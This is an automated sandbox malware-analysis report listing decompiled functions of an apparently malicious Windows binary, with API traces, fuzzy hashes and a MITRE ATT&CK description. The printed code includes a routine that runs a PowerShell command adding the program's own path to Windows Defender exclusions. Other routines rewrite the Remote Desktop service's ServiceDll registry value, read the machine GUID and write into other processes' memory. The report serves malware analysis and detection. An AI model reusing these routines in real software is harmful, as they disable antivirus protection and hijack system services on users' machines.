Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Windowlstrlen$CountDispatcherExceptionForegroundFreeInfoInputLastTextTickUserVirtual
String ID:
API String ID: 3825627427-0
Opcode ID: afa105543c89b26d0399e351716232cd9389c9086f425474f1c224e7362c12e9
Instruction ID: 6112c1113a0d39f135251136d0b8e5cc949fba4bd3578734fefef9c8c43a76ef
Opcode Fuzzy Hash: afa105543c89b26d0399e351716232cd9389c9086f425474f1c224e7362c12e9
Instruction Fuzzy Hash: F3111EB1D0020AABDB14EBA0DA99AEDB7BDFF98304F004155E546A6194EF78AB44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0103FFA8 Relevance: 6.0, APIs: 4, Instructions: 35
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103FFA8(void* __ecx) {
				void* _t14;
				long _t15;
				void** _t26;
				void* _t27;

				_t27 = __ecx;
				_t1 = _t27 + 0x14; // 0x105661c
				_t26 = _t1;
				if( *_t26 == 0) {
					L6:
					_t5 = _t27 + 0x10; // 0x1056618
					E010401AB(_t5);
					_t6 = _t27 + 4; // 0x105660c
					E010401AB(_t6);
					_t7 = _t27 + 0xc; // 0x1056614
					E010401AB(_t7);
					_t8 = _t27 + 8; // 0x1056610
					_t14 = E010401AB(_t8);
					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
					return _t14;
				}
				_t15 = GetCurrentThreadId();
				_t2 = _t27 + 0x18; // 0x0
				if(_t15 ==  *_t2) {
					L5:
					E010401AB(_t26);
					goto L6;
				}
				if( *(_t27 + 0x10) == 0) {
					return _t15;
				}
				_t4 = _t27 + 0x10; // 0x0
				SetEvent( *_t4);
				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
					TerminateThread( *_t26, 0xfffffffe);
				}
				goto L5;
			}

0x0103ffa9
0x0103ffac
0x0103ffac
0x0103ffb2
0x0103fff3
0x0103fff3
0x0103fff6
0x0103fffb
0x0103fffe
0x01040003
0x01040006
0x0104000b
0x0104000e
0x01040013
0x00000000
0x01040013
0x0103ffb4
0x0103ffba
0x0103ffbd
0x0103ffec
0x0103ffee
0x00000000
0x0103ffee
0x0103ffc3
0x01040019
0x01040019
0x0103ffc5
0x0103ffc8
0x0103ffe0
0x0103ffe6
0x0103ffe6
0x00000000

APIs

GetCurrentThreadId.KERNEL32 ref: 0103FFB4
SetEvent.KERNEL32(00000000), ref: 0103FFC8
WaitForSingleObject.KERNEL32(0105661C,00001388), ref: 0103FFD5
TerminateThread.KERNEL32(0105661C,000000FE), ref: 0103FFE6

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Thread$CurrentEventObjectSingleTerminateWait
String ID:
API String ID: 2174867186-0
Opcode ID: f74f0552f5784a648a78a08a3dd6e0df0db01d22c25b58383c980877a0527909
Instruction ID: 3cc257e66f02d42be08fa5f608db164146a73c7f009ea680b13fa467aba68a9e
Opcode Fuzzy Hash: f74f0552f5784a648a78a08a3dd6e0df0db01d22c25b58383c980877a0527909
Instruction Fuzzy Hash: A1014B751006028FE330AB14E8C8EEA7BB2AF64311F500A68F5D2514F9CB756849CA40

Uniqueness

Uniqueness Score: -1.00%

Function 010411D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E010411D7(intOrPtr* __ecx, void* __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				int* _t18;
				void* _t48;
				int* _t50;
				intOrPtr _t53;

				_t48 = __edx;
				_t35 = __ecx;
				_t50 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t53 =  *0x118ad8c; // 0x0
				if(_t53 != 0) {
					_t18 = 0x118ad88;
				} else {
					RegOpenKeyExW(0x80000002,  *(E010336F7( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
					asm("sbb esi, esi");
					E01035FEB(_v12);
					if(1 != 0) {
						E01042569(_t48, E010336F7( &_v12, L"MachineGuid"),  &_v24);
						E01035FEB(_v12);
						E01042554( &_v8);
					}
					E01032FCE(_t50, E010361C0( &_v16,  &_v24));
					E01033148( &_v16);
					_t35 = 0x118ad88;
					_t18 = _t50;
				}
				E01032FCE(_t35, _t18);
				E01033148( &_v24);
				E01042554( &_v8);
				return _t50;
			}

0x010411d7
0x010411d7
0x010411e1
0x010411e3
0x010411e6
0x010411e9
0x010411ec
0x010411ee
0x010411f1
0x010411f7
0x01041280
0x010411fd
0x0104121b
0x01041226
0x01041228
0x01041230
0x01041247
0x0104124f
0x01041257
0x01041257
0x0104126a
0x01041272
0x01041277
0x0104127c
0x0104127c
0x01041286
0x0104128e
0x01041296
0x010412a0

APIs

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0104121B

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01042569: RegQueryValueExW.ADVAPI32(?,76B30770,00000000,76B30770,00000000,00000000,?,00000000,0104563F,?,?,?,01042B8B,?,?,80000001), ref: 0104258C
Part of subcall function 01042569: RegQueryValueExW.ADVAPI32(?,76B30770,00000000,76B30770,00000000,00000000,?,01042B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 010425B0

Part of subcall function 01042554: RegCloseKey.KERNEL32(?,?,010426D3,?,?,0104577A), ref: 0104255E

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 010411FD
MachineGuid, xrefs: 01041236

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1654648907-1211650757
Opcode ID: 789063ee44fe5f9ea99334728f362c7abc454a65e6f59159615ff25e7403f90d
Instruction ID: 7587443c48f4a7702ea9a4ca45b3fc5394de8ad1f0ee4fb487ef79b682930f6d
Opcode Fuzzy Hash: 789063ee44fe5f9ea99334728f362c7abc454a65e6f59159615ff25e7403f90d
Instruction Fuzzy Hash: BA114FB0A0011AABCB04FF94DD918EDB77DAFA4601B504179F486B7190DFB06B05CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0103DCBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103DCBF(void* __edx) {
				void* _v8;
				void* _v12;
				short* _v16;
				int _v20;
				char _v24;
				void* _t28;
				void* _t46;
				int _t48;

				_t46 = __edx;
				_v8 = 0;
				E010336F7( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v24 = 0;
				_v20 = 0;
				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
					L3:
					_t48 = 0;
				} else {
					_t28 = E01042569(_t46, E010336F7( &_v12, L"ServiceDll"),  &_v24);
					E01035FEB(_v12);
					if(_t28 != 0) {
						_t48 = E0103335A(E0103300A( &_v24,  &_v12), 0x118ad4c);
						E01035FEB(_v12);
						_v12 = 0;
					} else {
						E01042554( &_v8);
						goto L3;
					}
				}
				E01033148( &_v24);
				E01035FEB(_v16);
				E01042554( &_v8);
				return _t48;
			}

0x0103dcbf
0x0103dcd1
0x0103dcd4
0x0103dcdc
0x0103dce9
0x0103dcf9
0x0103dd2b
0x0103dd2b
0x0103dcfb
0x0103dd10
0x0103dd1a
0x0103dd21
0x0103dd66
0x0103dd68
0x0103dd6d
0x0103dd23
0x0103dd26
0x00000000
0x0103dd26
0x0103dd21
0x0103dd30
0x0103dd38
0x0103dd40
0x0103dd4a

APIs

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0118AD18,?,?,0103E2F1,?,?), ref: 0103DCF1

Part of subcall function 01042569: RegQueryValueExW.ADVAPI32(?,76B30770,00000000,76B30770,00000000,00000000,?,00000000,0104563F,?,?,?,01042B8B,?,?,80000001), ref: 0104258C
Part of subcall function 01042569: RegQueryValueExW.ADVAPI32(?,76B30770,00000000,76B30770,00000000,00000000,?,01042B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 010425B0

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01042554: RegCloseKey.KERNEL32(?,?,010426D3,?,?,0104577A), ref: 0104255E

Strings

SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0103DCCC
ServiceDll, xrefs: 0103DCFF

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
API String ID: 1654648907-387424650
Opcode ID: 110e11b087d936ceac89e81a6b86b700717bdeee3bece881dd64f574f8ccdd5a
Instruction ID: 4e0a1b3e7ccbb331f5668c3568452d59131b8d0d266661cd7c0ea0c61070af75
Opcode Fuzzy Hash: 110e11b087d936ceac89e81a6b86b700717bdeee3bece881dd64f574f8ccdd5a
Instruction Fuzzy Hash: 31112B75E00119ABCB15FBA5D995CEEB77CAFE4600F5041A9E882BB290DF705F05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0103D856 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103D856(void* __ecx, void* __edx) {
				void* _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char _v28;
				char _v36;
				void* _t26;
				void* _t28;
				void* _t43;
				int _t44;
				void* _t45;

				_t43 = __edx;
				_t45 = __ecx;
				_t44 = 0;
				_v12 = 0;
				E010336F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v28 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
					_t26 = E01033333(_t45 + 0x34, _t43,  &_v36);
					_t28 = E010425DF( &_v12, E010336F7( &_v16, L"ServiceDll"), _t26, 2);
					E01035FEB(_v16);
					_v16 = 0;
					E01033148( &_v36);
					E01042554( &_v12);
					if(_t28 != 0) {
						_t44 = 1;
					}
				}
				E01033148( &_v28);
				E01035FEB(_v20);
				E01042554( &_v12);
				return _t44;
			}

0x0103d856
0x0103d85e
0x0103d860
0x0103d86a
0x0103d86d
0x0103d875
0x0103d882
0x0103d892
0x0103d89d
0x0103d8b4
0x0103d8be
0x0103d8c6
0x0103d8c9
0x0103d8d1
0x0103d8d8
0x0103d8da
0x0103d8da
0x0103d8d8
0x0103d8de
0x0103d8e6
0x0103d8ee
0x0103d8f8

APIs

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0103D88A

Part of subcall function 010425DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,010427D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 010425FE

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01042554: RegCloseKey.KERNEL32(?,?,010426D3,?,?,0104577A), ref: 0104255E

Strings

SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0103D862
ServiceDll, xrefs: 0103D8A3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$CloseDispatcherExceptionFreeOpenUserValueVirtual
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
API String ID: 1557097135-387424650
Opcode ID: 73216e045b81d8733d8b2b7359efd58659bef05d5ea252d74875b823d2e94077
Instruction ID: b390a27ef8b8d8e809e585941bcc881538dbb2cce64900bf8b3cf083f5b386a1
Opcode Fuzzy Hash: 73216e045b81d8733d8b2b7359efd58659bef05d5ea252d74875b823d2e94077
Instruction Fuzzy Hash: 9C1151B590011AABCB15EB95DC95CEFBB7CFFE4700F404069E88276290DF746A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01044F7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01044F7E(void* __ecx, void* __eflags) {
				CHAR* _t21;
				CHAR* _t22;

				_t22 = E01031085(0x100);
				_t21 = E01031085(0x100);
				E01031052(_t22, 0, 0x100);
				E01031052(_t21, 0, 0x100);
				GetModuleFileNameA(0, _t22, 0x100);
				E0103102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E01031133("powershell Add-MpPreference -ExclusionPath "));
				_t1 =  &(_t21[0x2b]); // 0x2b
				E0103102C(_t1, _t22, 3);
				_t2 =  &(_t22[0xff]); // 0xff
				E0103102C(E01031133(_t21) + _t21, _t2, 1);
				return WinExec(_t21, 0);
			}

0x01044f8d
0x01044f98
0x01044f9a
0x01044fa3
0x01044faf
0x01044fc3
0x01044fca
0x01044fcf
0x01044fd7
0x01044fea
0x01044ffe

APIs

Part of subcall function 01031085: GetProcessHeap.KERNEL32(00000000,?,010434B7,00400000,?,?,00000000,?,?,01045553), ref: 0103108B
Part of subcall function 01031085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01045553), ref: 01031092

GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,76B30770,00000000,010456DE), ref: 01044FAF
WinExec.KERNEL32 ref: 01044FF5

Strings

powershell Add-MpPreference -ExclusionPath , xrefs: 01044FB5, 01044FBA, 01044FC1

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Heap$AllocateExecFileModuleNameProcess
String ID: powershell Add-MpPreference -ExclusionPath
API String ID: 1183730998-2194938034
Opcode ID: a5a1700c0558dcc0458c8c9fcd8b3f97a5691a21f7cdc2a2f958d20d00962c1d
Instruction ID: 40687dccf41e68965678a650fdf9f72c5dd0c8dbb725eb0eb05508bc67446f81
Opcode Fuzzy Hash: a5a1700c0558dcc0458c8c9fcd8b3f97a5691a21f7cdc2a2f958d20d00962c1d
Instruction Fuzzy Hash: E6F06DF6B40256BAE13072B19CCDFFBA65CDFEDB50F040825F684A2181EAB9990142B1

Uniqueness

Uniqueness Score: -1.00%

Function 01042F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01042F0D(void* __ecx) {
				void* _v8;
				short* _t10;

				_t10 = L"SOFTWARE\\Microsoft\\Control Panel\\";
				if(RegOpenKeyExW(0x80000001, _t10, 0, 0xf003f,  &_v8) == 2) {
					RegCreateKeyExW(0x80000001, _t10, 0, 0, 0, 0xf003f, 0,  &_v8, 0);
				}
				return _v8;
			}

0x01042f20
0x01042f35
0x01042f47
0x01042f47
0x01042f54

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,0104306C,00000000,7476FE60,7476F560,?,?,0104306C), ref: 01042F2C
RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,0104306C,00000000,?,?,0104306C), ref: 01042F47

Strings

SOFTWARE\Microsoft\Control Panel\, xrefs: 01042F20, 01042F26, 01042F41

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CreateOpen
String ID: SOFTWARE\Microsoft\Control Panel\
API String ID: 436179556-1270043152
Opcode ID: f7f8d7088c8dbb4c631d48facb406bfbc8b692200a2ebba717fded16113d6476
Instruction ID: c4a940d2e95ace8ca2a3febad7b0a6045fa4a297dc574c4336a5d7a54ce52c6a
Opcode Fuzzy Hash: f7f8d7088c8dbb4c631d48facb406bfbc8b692200a2ebba717fded16113d6476
Instruction Fuzzy Hash: 91E0E5BA601028FF973055969D88DEB7EACDB466E4B200065FD05E2105D1615E04D6F0

Uniqueness

Uniqueness Score: -1.00%

Function 0104130F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0104130F(void* __ecx) {
				void* _t7;
				void* _t13;
				void* _t16;

				_t13 = __ecx;
				_t16 = __ecx;
				_t7 = CreateFileW( *(__ecx + 4), 0xc0000000, 1, 0, 1, 0, 0);
				 *(_t16 + 8) = _t7;
				if(_t7 != 0xffffffff || GetLastError() != 0x50) {
					return 0 |  *(_t16 + 8) != 0xffffffff;
				} else {
					_push(_t13);
					 *(_t16 + 8) = 0;
					return E010416B1(_t16, 0xc0000000);
				}
			}

0x0104130f
0x01041314
0x01041326
0x0104132c
0x01041332
0x00000000
0x0104133f
0x0104133f
0x01041343
0x00000000
0x01041346

APIs

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000,?,?,?,010391CE,?,?,?), ref: 01041326
GetLastError.KERNEL32(?,?,?,010391CE,?,?,?), ref: 01041334

Part of subcall function 010416B1: CreateFileW.KERNEL32(?,?,00000001,00000000,00000003,00000000,00000000,?,00000000,?,01032A63,40000000,?,?,00000000), ref: 010416C7
Part of subcall function 010416B1: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01032A63,40000000,?,?,00000000), ref: 010416D7

Strings

@Mqt, xrefs: 01041334

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: File$Create$ErrorLastSize
String ID: @Mqt
API String ID: 1648502652-2740872224
Opcode ID: 5fb7ac44fa156d94e15e4cc4ea1ec891c963c27f544b294928bc35b483b2daee
Instruction ID: 6ddaee7b10a79b41424877b1a1bfab4fe010a2f81aa975a3f87f0a46c2f2b813
Opcode Fuzzy Hash: 5fb7ac44fa156d94e15e4cc4ea1ec891c963c27f544b294928bc35b483b2daee
Instruction Fuzzy Hash: 32F030B5100611BFD2301A669DCDE6B79ADEB95B72F108A2AF1AAC25D0C77178D08620

Uniqueness

Uniqueness Score: -1.00%

Function 0103ECE1 Relevance: 5.1, APIs: 4, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103ECE1(void** __ecx, void** __edx, void* __eflags) {
				void** _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				char _v100;
				void* _t35;
				void* _t38;
				void* _t62;

				_v8 = __edx;
				_t62 = 0;
				_v16 =  &_v100;
				_v24 = 0;
				_v12 = 0x1056970;
				_v20 = 0x1056970;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				if(E0103EE24( &_v16, __ecx, 0x40) != 0 && _v100 == 0x5a4d) {
					_v32 =  *((intOrPtr*)(__ecx)) + _v40;
					_t35 = LocalAlloc(0x40, 0x18);
					_v16 = _t35;
					if(_t35 != 0) {
						E0103EE24( &_v16,  &_v32, 0x18);
						_t44 =  ==  ? 0xf8 : 0x108;
						_t38 = LocalAlloc(0x40,  ==  ? 0xf8 : 0x108);
						_v24 = _t38;
						if(_t38 != 0) {
							_t62 = E0103EE24( &_v24,  &_v32, _t44);
							if(_t62 == 0) {
								LocalFree(_v24);
							} else {
								 *_v8 = _v24;
							}
						}
						LocalFree(_v16);
					}
				}
				return _t62;
			}

0x0103ecec
0x0103ecf2
0x0103ecf4
0x0103ecff
0x0103ed02
0x0103ed07
0x0103ed0f
0x0103ed1a
0x0103ed3a
0x0103ed3d
0x0103ed3f
0x0103ed44
0x0103ed4e
0x0103ed66
0x0103ed6c
0x0103ed74
0x0103ed79
0x0103ed87
0x0103ed8c
0x0103ed9b
0x0103ed8e
0x0103ed94
0x0103ed94
0x0103ed8c
0x0103eda0
0x0103eda0
0x0103ed44
0x0103eda8

APIs

Part of subcall function 0103EE24: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0103EE72
Part of subcall function 0103EE24: WriteFile.KERNEL32(?,0103EC60,01056970,00000150,00000000,?,00000000,00000000), ref: 0103EE92

LocalAlloc.KERNEL32(00000040,00000018,00000001,?,0103EAD8), ref: 0103ED3D

Part of subcall function 0103EE24: WriteProcessMemory.KERNEL32(?,?,0103EC60,01056970,00000000,?,00000000,00000000), ref: 0103EEB3
Part of subcall function 0103EE24: LocalAlloc.KERNEL32(00000040,01056970,?,00000000,00000000), ref: 0103EEC0
Part of subcall function 0103EE24: LocalFree.KERNEL32(?), ref: 0103EEF6

LocalAlloc.KERNEL32(00000040,00000108), ref: 0103ED6C
LocalFree.KERNEL32(00000000), ref: 0103EDA0

Part of subcall function 0103EE24: SetFilePointer.KERNEL32(?,0103EC60,00000000,00000000,?,00000000,00000000), ref: 0103EF1A
Part of subcall function 0103EE24: ReadFile.KERNEL32(?,?,01056970,00000150,00000000), ref: 0103EF37
Part of subcall function 0103EE24: ReadProcessMemory.KERNEL32(?,0103EC60,?,01056970,00000000,?,00000000,00000000), ref: 0103EF4F

LocalFree.KERNEL32(?), ref: 0103ED9B

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Local$File$AllocFree$MemoryPointerProcessReadWrite
String ID:
API String ID: 2785045919-0
Opcode ID: 89a89d757fabfb04f5fb49bcd2d2a4a85979746f91df00e23c2d113227cb2161
Instruction ID: c3bc1fb932ccd9a6b7224c4d3ad59c0f0964ada09990b7e8980b3351a6ced83b
Opcode Fuzzy Hash: 89a89d757fabfb04f5fb49bcd2d2a4a85979746f91df00e23c2d113227cb2161
Instruction Fuzzy Hash: E9214F75E0020A9BDB10EFA9C9849DEFBF9EF84700F148166D540B7290EB74AE00CF90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

